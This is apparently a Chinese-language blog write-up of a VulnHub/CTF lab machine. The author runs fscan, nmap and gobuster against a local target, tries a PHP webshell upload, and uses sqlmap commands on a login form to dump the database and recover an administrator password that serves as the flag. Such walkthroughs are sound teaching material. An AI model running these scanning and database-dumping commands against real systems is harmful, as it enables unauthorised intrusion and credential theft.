先扫描一下网段fscan -h 192.168.64.0/24
notion image
192.168.64.3是我们的靶机,开放了web端口80,用nmap去扫描一下服务
notion image
就是apache服务,我们去访问一下网站
notion image
中途靶机重新配置了一下靶机ip变成192.168.64.4 了
貌似啥都没有,去扫一下目录看看能不能有有用的东西gobuster dir -u http://192.168.64.4/ -w /Users/qin/Documents/渗透/Fuzz_dict/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,html,txt,bak,zip
notion image
扫到了exploit.html,去查看一下
notion image
发现有个文件上传的点,我们先上传一下php木马看看行不行
notion image
上传之后多出了莫名的字符,暂时不知道怎么利用。后面查看网上的wp发现还有enter_network这个路由(我的字典就扫不出来),去访问一下发现是个登陆框
notion image
 
先尝试注入,获取数据库名sqlmap -u 'http://192.168.64.4/enter_network/' --data 'pass=1&sub=SEND&user=1' --dbs
notion image
直接dump数据库sqlmap -u 'http://192.168.64.4/enter_network/' --data 'pass=1&sub=SEND&user=1' -D Machine --dump --batch
notion image
得到了用户名和密码,去登陆一下用户名:administrator ;密码:FLAG{N7:KSA_01}
到这就获取了flag,这个靶机根本不能渗透进去,垃圾靶机
2025浙江省CTF决赛Matrix-Breakout: 2 Morpheus(VulnHub)
Loading...
NotionNext
NotionNext
一个普通的干饭人🍚
公告
🎉qetx新博客已经上线🎉
-- 感谢您的支持 ---
这里会有什么?
ctf知识
RL学习笔记
有趣的生活日常